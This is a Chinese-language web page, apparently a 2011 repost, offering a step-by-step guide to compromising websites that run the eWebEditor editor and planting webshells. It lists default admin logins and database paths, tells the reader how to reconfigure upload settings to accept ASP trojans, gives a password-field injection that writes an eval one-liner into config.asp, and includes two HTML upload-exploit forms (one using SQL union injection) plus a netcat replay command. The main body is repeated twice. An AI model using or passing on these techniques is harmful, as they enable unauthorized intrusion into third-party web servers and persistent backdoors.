腳本入侵 入侵ewebeditor編輯器一些技巧
發(fā)布時(shí)間:2011-04-24 15:39:30 作者:佚名
我要評(píng)論

腳本入侵 入侵ewebeditor編輯器一些技巧,使用ewebeditor的朋友可以參考下。
eWebEditor編輯器
建議最好檢測下admin_style.asp文件是否可以直接訪問 直接到樣式管理
默認(rèn)后臺(tái)地址:/ewebeditor/admin_login.asp
使用默認(rèn)密碼:admin/admin 或 admin/admin888
不行就默認(rèn)數(shù)據(jù)庫路徑 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一種方法
登陸后臺(tái)點(diǎn)擊“樣式管理”-選擇新增樣式
只寫這幾樣 大家照做就行了
樣式名稱:chouxiaozi 隨便寫
路徑模式:選擇絕對(duì)路徑
圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
這樣我們可以上各種格式的木馬 我們只要把木馬改成添加的這些格式就可以了
上傳路徑:寫上這個(gè)admin/ 或?qū)? 免的別人把UploadFile/目錄刪了 我們找不到馬
內(nèi)容路徑:空 記得
圖片限制:寫上1000 免的上不了我們的asp木馬
然后我們就可以提交了
就可以看到樣式增加成功!
然后我們按-返回樣式管理 找到剛才添加的樣式名稱 然后按工具欄 在按新增工具欄
然后按-按鈕設(shè)置 在可選按鈕 選擇插入圖片然后按》 -然后保存設(shè)置
在返回樣式管理-找到剛才添加的樣式名稱-按預(yù)覽-這里回看到一個(gè)正方形的東西 我們點(diǎn)擊
然后上傳我們的剛才添加的格式的木馬
拿webshell方法第二種方法
登陸后臺(tái),點(diǎn)擊修改密碼---新密碼設(shè)置為 1":eval request("choxiaozi")’
設(shè)置成功后,訪問asp/config.asp文件即可,一句話木馬被寫入到這個(gè)文件里面了.
然后用一句話客戶端連接
拿webshell方法第三種方法
ewebeditor不登陸也獲得webshell 這就不多說了 大家去百度搜索 ewebeditor不登陸也獲得webshell
下載教程看
拿webshell方法第四種方法
利用ewebeditor asp版 2.1.6 上傳漏洞利用程序
首先先看eWebEditor/upload.asp 上傳地址存在不
存在的話就把下面的代碼保存為
H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="這里寫上傳地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上傳地址保存為chouxiaozi.HTM文件,打開可以直接上傳CER文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第五種方法
ewebeditor 雞肋的上傳漏洞
首先先看下ewebeditor/asp/upload.asp 上傳地址存在不
存在就
把下面的代碼
<form action="這里寫上傳地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存為chouxiaozi.html
打開可以直接上傳gif文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第六種方法
利用eWebEditor/upload.asp
抓包和nc上傳
抓包c(diǎn)ookies 參數(shù) 和文件的數(shù)據(jù) 然后保存成文本 比如chouxiaozi.txt
然后用編譯C32asm 或等等編譯工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上傳 百度搜索相關(guān)教程
回頭說下有時(shí)候進(jìn)了個(gè)網(wǎng)站后臺(tái)-看到了eWebEditor編輯器 但是找不到eWebEditor目錄地址
我們來點(diǎn)鼠標(biāo)右鍵-查看源代碼,找到仔細(xì)找eWebEditor的路徑。
建議最好檢測下admin_style.asp文件是否可以直接訪問 直接到樣式管理
默認(rèn)后臺(tái)地址:/ewebeditor/admin_login.asp
使用默認(rèn)密碼:admin/admin 或 admin/admin888
不行就默認(rèn)數(shù)據(jù)庫路徑 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一種方法
登陸后臺(tái)點(diǎn)擊“樣式管理”-選擇新增樣式
只寫這幾樣 大家照做就行了
樣式名稱:chouxiaozi 隨便寫
路徑模式:選擇絕對(duì)路徑
圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
這樣我們可以上各種格式的木馬 我們只要把木馬改成添加的這些格式就可以了
上傳路徑:寫上這個(gè)admin/ 或?qū)? 免的別人把UploadFile/目錄刪了 我們找不到馬
內(nèi)容路徑:空 記得
圖片限制:寫上1000 免的上不了我們的asp木馬
然后我們就可以提交了
就可以看到樣式增加成功!
然后我們按-返回樣式管理 找到剛才添加的樣式名稱 然后按工具欄 在按新增工具欄
然后按-按鈕設(shè)置 在可選按鈕 選擇插入圖片然后按》 -然后保存設(shè)置
在返回樣式管理-找到剛才添加的樣式名稱-按預(yù)覽-這里回看到一個(gè)正方形的東西 我們點(diǎn)擊
然后上傳我們的剛才添加的格式的木馬
拿webshell方法第二種方法
登陸后臺(tái),點(diǎn)擊修改密碼---新密碼設(shè)置為 1":eval request("choxiaozi")’
設(shè)置成功后,訪問asp/config.asp文件即可,一句話木馬被寫入到這個(gè)文件里面了.
然后用一句話客戶端連接
拿webshell方法第三種方法
ewebeditor不登陸也獲得webshell 這就不多說了 大家去百度搜索 ewebeditor不登陸也獲得webshell
下載教程看
拿webshell方法第四種方法
利用ewebeditor asp版 2.1.6 上傳漏洞利用程序
首先先看eWebEditor/upload.asp 上傳地址存在不
存在的話就把下面的代碼保存為
H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="這里寫上傳地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上傳地址保存為chouxiaozi.HTM文件,打開可以直接上傳CER文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第五種方法
ewebeditor 雞肋的上傳漏洞
首先先看下ewebeditor/asp/upload.asp 上傳地址存在不
存在就
把下面的代碼
<form action="這里寫上傳地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存為chouxiaozi.html
打開可以直接上傳gif文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第六種方法
利用eWebEditor/upload.asp
抓包和nc上傳
抓包c(diǎn)ookies 參數(shù) 和文件的數(shù)據(jù) 然后保存成文本 比如chouxiaozi.txt
然后用編譯C32asm 或等等編譯工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上傳 百度搜索相關(guān)教程
回頭說下有時(shí)候進(jìn)了個(gè)網(wǎng)站后臺(tái)-看到了eWebEditor編輯器 但是找不到eWebEditor目錄地址
我們來點(diǎn)鼠標(biāo)右鍵-查看源代碼,找到仔細(xì)找eWebEditor的路徑。
相關(guān)文章
- 腳本入侵-ASP網(wǎng)站入侵一些技巧 先說明下 先看下是不是html轉(zhuǎn)的asp生成的站2011-04-24
網(wǎng)站中了WebShell木馬病毒怎么辦?用這些方法快速解決
WebShell通常是以asp、php、jsp、asa或者cgi等網(wǎng)頁文件形式存在的—種命令執(zhí)行環(huán)境,在入侵網(wǎng)站后,通常會(huì)將WebShell后門文件與網(wǎng)站服務(wù)器WEB目錄下正常的網(wǎng)頁文件混在—起2011-06-15- “上傳漏洞”入侵是目前對(duì)網(wǎng)站最廣泛的入侵方法。90%的具有上傳頁面的網(wǎng)站,都存在上傳漏洞。本文將介紹常見的上傳漏洞及其防范技巧。2012-05-08
必須了解的黑客入侵網(wǎng)站的十條原因及相應(yīng)抵御方法
Internet Explorer、Firefox和Windows操作系統(tǒng)中包括許多可以被黑客運(yùn)用的縫隙,特別是在用戶常常不及時(shí)裝置補(bǔ)丁的情況下。2012-11-01防止黑客入侵系統(tǒng)建立很難發(fā)現(xiàn)的隱藏帳戶
一般用戶很難發(fā)現(xiàn)系統(tǒng)中隱藏賬戶的存在,那么該怎么辦呢?其實(shí)我們可以通過以下幾點(diǎn)來解決這個(gè)問題,接下來教你如何把隱藏賬戶徹底請(qǐng)出系統(tǒng),感興趣的朋友不要錯(cuò)過2013-10-09- 445端口入侵,在這之前我們首先要看的還是445端口為什么回成為入侵的端口呢?445端口就是IPC 服務(wù)的默認(rèn)端口2013-11-07
- 請(qǐng)問你是黑客的菜嗎?有效防范黑客入侵的絕招,本文揭露了神秘黑客的收入、攻擊花費(fèi)的時(shí)間,通過了解黑客這一群體告訴我們通過什么方式可以有效防范黑客的入侵,感興趣的小2016-05-18
怎樣利用架構(gòu)廉價(jià)的追蹤網(wǎng)絡(luò)中的入侵者
在缺乏大量預(yù)算的前提下要怎樣追蹤網(wǎng)絡(luò)入侵者?這里有一個(gè)廉價(jià)的解決辦法:一旦架構(gòu)建立并且數(shù)據(jù)開始收集,網(wǎng)絡(luò)防御者可以在這些被動(dòng)DNS數(shù)據(jù)上執(zhí)行大范圍的分析來追蹤網(wǎng)絡(luò)2016-06-01